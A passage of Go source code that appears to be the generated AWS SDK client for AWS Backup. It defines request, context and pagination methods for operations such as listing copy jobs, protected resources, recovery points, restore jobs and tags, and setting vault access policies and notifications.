// See ListCopyJobs for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListCopyJobsWithContext(ctx aws.Context, input *ListCopyJobsInput, opts ...request.Option) (*ListCopyJobsOutput, error) {
req, out := c.ListCopyJobsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListCopyJobsPages iterates over the pages of a ListCopyJobs operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListCopyJobs method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListCopyJobs operation.
// pageNum := 0
// err := client.ListCopyJobsPages(params,
// func(page *backup.ListCopyJobsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListCopyJobsPages(input *ListCopyJobsInput, fn func(*ListCopyJobsOutput, bool) bool) error {
return c.ListCopyJobsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListCopyJobsPagesWithContext same as ListCopyJobsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListCopyJobsPagesWithContext(ctx aws.Context, input *ListCopyJobsInput, fn func(*ListCopyJobsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListCopyJobsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListCopyJobsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListCopyJobsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListProtectedResources = "ListProtectedResources"
// ListProtectedResourcesRequest generates a "aws/request.Request" representing the
// client's request for the ListProtectedResources operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListProtectedResources for more information on using the ListProtectedResources
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListProtectedResourcesRequest method.
// req, resp := client.ListProtectedResourcesRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListProtectedResources
func (c *Backup) ListProtectedResourcesRequest(input *ListProtectedResourcesInput) (req *request.Request, output *ListProtectedResourcesOutput) {
op := &request.Operation{
Name: opListProtectedResources,
HTTPMethod: "GET",
HTTPPath: "/resources/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListProtectedResourcesInput{}
}
output = &ListProtectedResourcesOutput{}
req = c.newRequest(op, input, output)
return
}
// ListProtectedResources API operation for AWS Backup.
//
// Returns an array of resources successfully backed up by AWS Backup, including
// the time the resource was saved, an Amazon Resource Name (ARN) of the resource,
// and a resource type.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListProtectedResources for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListProtectedResources
func (c *Backup) ListProtectedResources(input *ListProtectedResourcesInput) (*ListProtectedResourcesOutput, error) {
req, out := c.ListProtectedResourcesRequest(input)
return out, req.Send()
}
// ListProtectedResourcesWithContext is the same as ListProtectedResources with the addition of
// the ability to pass a context and additional request options.
//
// See ListProtectedResources for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListProtectedResourcesWithContext(ctx aws.Context, input *ListProtectedResourcesInput, opts ...request.Option) (*ListProtectedResourcesOutput, error) {
req, out := c.ListProtectedResourcesRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListProtectedResourcesPages iterates over the pages of a ListProtectedResources operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListProtectedResources method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListProtectedResources operation.
// pageNum := 0
// err := client.ListProtectedResourcesPages(params,
// func(page *backup.ListProtectedResourcesOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListProtectedResourcesPages(input *ListProtectedResourcesInput, fn func(*ListProtectedResourcesOutput, bool) bool) error {
return c.ListProtectedResourcesPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListProtectedResourcesPagesWithContext same as ListProtectedResourcesPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListProtectedResourcesPagesWithContext(ctx aws.Context, input *ListProtectedResourcesInput, fn func(*ListProtectedResourcesOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListProtectedResourcesInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListProtectedResourcesRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListProtectedResourcesOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListRecoveryPointsByBackupVault = "ListRecoveryPointsByBackupVault"
// ListRecoveryPointsByBackupVaultRequest generates a "aws/request.Request" representing the
// client's request for the ListRecoveryPointsByBackupVault operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListRecoveryPointsByBackupVault for more information on using the ListRecoveryPointsByBackupVault
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListRecoveryPointsByBackupVaultRequest method.
// req, resp := client.ListRecoveryPointsByBackupVaultRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRecoveryPointsByBackupVault
func (c *Backup) ListRecoveryPointsByBackupVaultRequest(input *ListRecoveryPointsByBackupVaultInput) (req *request.Request, output *ListRecoveryPointsByBackupVaultOutput) {
op := &request.Operation{
Name: opListRecoveryPointsByBackupVault,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListRecoveryPointsByBackupVaultInput{}
}
output = &ListRecoveryPointsByBackupVaultOutput{}
req = c.newRequest(op, input, output)
return
}
// ListRecoveryPointsByBackupVault API operation for AWS Backup.
//
// Returns detailed information about the recovery points stored in a backup
// vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListRecoveryPointsByBackupVault for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRecoveryPointsByBackupVault
func (c *Backup) ListRecoveryPointsByBackupVault(input *ListRecoveryPointsByBackupVaultInput) (*ListRecoveryPointsByBackupVaultOutput, error) {
req, out := c.ListRecoveryPointsByBackupVaultRequest(input)
return out, req.Send()
}
// ListRecoveryPointsByBackupVaultWithContext is the same as ListRecoveryPointsByBackupVault with the addition of
// the ability to pass a context and additional request options.
//
// See ListRecoveryPointsByBackupVault for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRecoveryPointsByBackupVaultWithContext(ctx aws.Context, input *ListRecoveryPointsByBackupVaultInput, opts ...request.Option) (*ListRecoveryPointsByBackupVaultOutput, error) {
req, out := c.ListRecoveryPointsByBackupVaultRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListRecoveryPointsByBackupVaultPages iterates over the pages of a ListRecoveryPointsByBackupVault operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListRecoveryPointsByBackupVault method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListRecoveryPointsByBackupVault operation.
// pageNum := 0
// err := client.ListRecoveryPointsByBackupVaultPages(params,
// func(page *backup.ListRecoveryPointsByBackupVaultOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListRecoveryPointsByBackupVaultPages(input *ListRecoveryPointsByBackupVaultInput, fn func(*ListRecoveryPointsByBackupVaultOutput, bool) bool) error {
return c.ListRecoveryPointsByBackupVaultPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListRecoveryPointsByBackupVaultPagesWithContext same as ListRecoveryPointsByBackupVaultPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRecoveryPointsByBackupVaultPagesWithContext(ctx aws.Context, input *ListRecoveryPointsByBackupVaultInput, fn func(*ListRecoveryPointsByBackupVaultOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListRecoveryPointsByBackupVaultInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListRecoveryPointsByBackupVaultRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListRecoveryPointsByBackupVaultOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListRecoveryPointsByResource = "ListRecoveryPointsByResource"
// ListRecoveryPointsByResourceRequest generates a "aws/request.Request" representing the
// client's request for the ListRecoveryPointsByResource operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListRecoveryPointsByResource for more information on using the ListRecoveryPointsByResource
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListRecoveryPointsByResourceRequest method.
// req, resp := client.ListRecoveryPointsByResourceRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRecoveryPointsByResource
func (c *Backup) ListRecoveryPointsByResourceRequest(input *ListRecoveryPointsByResourceInput) (req *request.Request, output *ListRecoveryPointsByResourceOutput) {
op := &request.Operation{
Name: opListRecoveryPointsByResource,
HTTPMethod: "GET",
HTTPPath: "/resources/{resourceArn}/recovery-points/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListRecoveryPointsByResourceInput{}
}
output = &ListRecoveryPointsByResourceOutput{}
req = c.newRequest(op, input, output)
return
}
// ListRecoveryPointsByResource API operation for AWS Backup.
//
// Returns detailed information about recovery points of the type specified
// by a resource Amazon Resource Name (ARN).
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListRecoveryPointsByResource for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRecoveryPointsByResource
func (c *Backup) ListRecoveryPointsByResource(input *ListRecoveryPointsByResourceInput) (*ListRecoveryPointsByResourceOutput, error) {
req, out := c.ListRecoveryPointsByResourceRequest(input)
return out, req.Send()
}
// ListRecoveryPointsByResourceWithContext is the same as ListRecoveryPointsByResource with the addition of
// the ability to pass a context and additional request options.
//
// See ListRecoveryPointsByResource for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRecoveryPointsByResourceWithContext(ctx aws.Context, input *ListRecoveryPointsByResourceInput, opts ...request.Option) (*ListRecoveryPointsByResourceOutput, error) {
req, out := c.ListRecoveryPointsByResourceRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListRecoveryPointsByResourcePages iterates over the pages of a ListRecoveryPointsByResource operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListRecoveryPointsByResource method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListRecoveryPointsByResource operation.
// pageNum := 0
// err := client.ListRecoveryPointsByResourcePages(params,
// func(page *backup.ListRecoveryPointsByResourceOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListRecoveryPointsByResourcePages(input *ListRecoveryPointsByResourceInput, fn func(*ListRecoveryPointsByResourceOutput, bool) bool) error {
return c.ListRecoveryPointsByResourcePagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListRecoveryPointsByResourcePagesWithContext same as ListRecoveryPointsByResourcePages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRecoveryPointsByResourcePagesWithContext(ctx aws.Context, input *ListRecoveryPointsByResourceInput, fn func(*ListRecoveryPointsByResourceOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListRecoveryPointsByResourceInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListRecoveryPointsByResourceRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListRecoveryPointsByResourceOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListRestoreJobs = "ListRestoreJobs"
// ListRestoreJobsRequest generates a "aws/request.Request" representing the
// client's request for the ListRestoreJobs operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListRestoreJobs for more information on using the ListRestoreJobs
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListRestoreJobsRequest method.
// req, resp := client.ListRestoreJobsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRestoreJobs
func (c *Backup) ListRestoreJobsRequest(input *ListRestoreJobsInput) (req *request.Request, output *ListRestoreJobsOutput) {
op := &request.Operation{
Name: opListRestoreJobs,
HTTPMethod: "GET",
HTTPPath: "/restore-jobs/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListRestoreJobsInput{}
}
output = &ListRestoreJobsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListRestoreJobs API operation for AWS Backup.
//
// Returns a list of jobs that AWS Backup initiated to restore a saved resource,
// including metadata about the recovery process.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListRestoreJobs for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRestoreJobs
func (c *Backup) ListRestoreJobs(input *ListRestoreJobsInput) (*ListRestoreJobsOutput, error) {
req, out := c.ListRestoreJobsRequest(input)
return out, req.Send()
}
// ListRestoreJobsWithContext is the same as ListRestoreJobs with the addition of
// the ability to pass a context and additional request options.
//
// See ListRestoreJobs for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRestoreJobsWithContext(ctx aws.Context, input *ListRestoreJobsInput, opts ...request.Option) (*ListRestoreJobsOutput, error) {
req, out := c.ListRestoreJobsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListRestoreJobsPages iterates over the pages of a ListRestoreJobs operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListRestoreJobs method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListRestoreJobs operation.
// pageNum := 0
// err := client.ListRestoreJobsPages(params,
// func(page *backup.ListRestoreJobsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListRestoreJobsPages(input *ListRestoreJobsInput, fn func(*ListRestoreJobsOutput, bool) bool) error {
return c.ListRestoreJobsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListRestoreJobsPagesWithContext same as ListRestoreJobsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRestoreJobsPagesWithContext(ctx aws.Context, input *ListRestoreJobsInput, fn func(*ListRestoreJobsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListRestoreJobsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListRestoreJobsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListRestoreJobsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opListTags = "ListTags"
// ListTagsRequest generates a "aws/request.Request" representing the
// client's request for the ListTags operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListTags for more information on using the ListTags
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListTagsRequest method.
// req, resp := client.ListTagsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListTags
func (c *Backup) ListTagsRequest(input *ListTagsInput) (req *request.Request, output *ListTagsOutput) {
op := &request.Operation{
Name: opListTags,
HTTPMethod: "GET",
HTTPPath: "/tags/{resourceArn}/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListTagsInput{}
}
output = &ListTagsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListTags API operation for AWS Backup.
//
// Returns a list of key-value pairs assigned to a target recovery point, backup
// plan, or backup vault.
//
// ListTags are currently only supported with Amazon EFS backups.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListTags for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListTags
func (c *Backup) ListTags(input *ListTagsInput) (*ListTagsOutput, error) {
req, out := c.ListTagsRequest(input)
return out, req.Send()
}
// ListTagsWithContext is the same as ListTags with the addition of
// the ability to pass a context and additional request options.
//
// See ListTags for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListTagsWithContext(ctx aws.Context, input *ListTagsInput, opts ...request.Option) (*ListTagsOutput, error) {
req, out := c.ListTagsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListTagsPages iterates over the pages of a ListTags operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListTags method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListTags operation.
// pageNum := 0
// err := client.ListTagsPages(params,
// func(page *backup.ListTagsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListTagsPages(input *ListTagsInput, fn func(*ListTagsOutput, bool) bool) error {
return c.ListTagsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListTagsPagesWithContext same as ListTagsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListTagsPagesWithContext(ctx aws.Context, input *ListTagsInput, fn func(*ListTagsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListTagsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListTagsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListTagsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
const opPutBackupVaultAccessPolicy = "PutBackupVaultAccessPolicy"
// PutBackupVaultAccessPolicyRequest generates a "aws/request.Request" representing the
// client's request for the PutBackupVaultAccessPolicy operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See PutBackupVaultAccessPolicy for more information on using the PutBackupVaultAccessPolicy
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the PutBackupVaultAccessPolicyRequest method.
// req, resp := client.PutBackupVaultAccessPolicyRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/PutBackupVaultAccessPolicy
func (c *Backup) PutBackupVaultAccessPolicyRequest(input *PutBackupVaultAccessPolicyInput) (req *request.Request, output *PutBackupVaultAccessPolicyOutput) {
op := &request.Operation{
Name: opPutBackupVaultAccessPolicy,
HTTPMethod: "PUT",
HTTPPath: "/backup-vaults/{backupVaultName}/access-policy",
}
if input == nil {
input = &PutBackupVaultAccessPolicyInput{}
}
output = &PutBackupVaultAccessPolicyOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// PutBackupVaultAccessPolicy API operation for AWS Backup.
//
// Sets a resource-based policy that is used to manage access permissions on
// the target backup vault. Requires a backup vault name and an access policy
// document in JSON format.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation PutBackupVaultAccessPolicy for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/PutBackupVaultAccessPolicy
func (c *Backup) PutBackupVaultAccessPolicy(input *PutBackupVaultAccessPolicyInput) (*PutBackupVaultAccessPolicyOutput, error) {
req, out := c.PutBackupVaultAccessPolicyRequest(input)
return out, req.Send()
}
// PutBackupVaultAccessPolicyWithContext is the same as PutBackupVaultAccessPolicy with the addition of
// the ability to pass a context and additional request options.
//
// See PutBackupVaultAccessPolicy for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) PutBackupVaultAccessPolicyWithContext(ctx aws.Context, input *PutBackupVaultAccessPolicyInput, opts ...request.Option) (*PutBackupVaultAccessPolicyOutput, error) {
req, out := c.PutBackupVaultAccessPolicyRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opPutBackupVaultNotifications = "PutBackupVaultNotifications"
// PutBackupVaultNotificationsRequest generates a "aws/request.Request" representing the
// client's request for the PutBackupVaultNotifications operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See PutBackupVaultNotifications for more information on using the PutBackupVaultNotifications
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the PutBackupVaultNotificationsRequest method.
// req, resp := client.PutBackupVaultNotificationsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/PutBackupVaultNotifications
func (c *Backup) PutBackupVaultNotificationsRequest(input *PutBackupVaultNotificationsInput) (req *request.Request, output *PutBackupVaultNotificationsOutput) {
op := &request.Operation{
Name: opPutBackupVaultNotifications,
HTTPMethod: "PUT",
HTTPPath: "/backup-vaults/{backupVaultName}/notification-configuration",
}
if input == nil {
input = &PutBackupVaultNotificationsInput{}
}
output = &PutBackupVaultNotificationsOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// PutBackupVaultNotifications API operation for AWS Backup.
//
// Turns on notifications on a backup vault for the specified topic and events.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation PutBackupVaultNotifications for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/PutBackupVaultNotifications
func (c *Backup) PutBackupVaultNotifications(input *PutBackupVaultNotificationsInput) (*PutBackupVaultNotificationsOutput, error) {
req, out := c.PutBackupVaultNotificationsRequest(input)
return out, req.Send()
}
// PutBackupVaultNotificationsWithContext is the same as PutBackupVaultNotifications with the addition of
// the ability to pass a context and additional request options.
//
// See PutBackupVaultNotifications for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
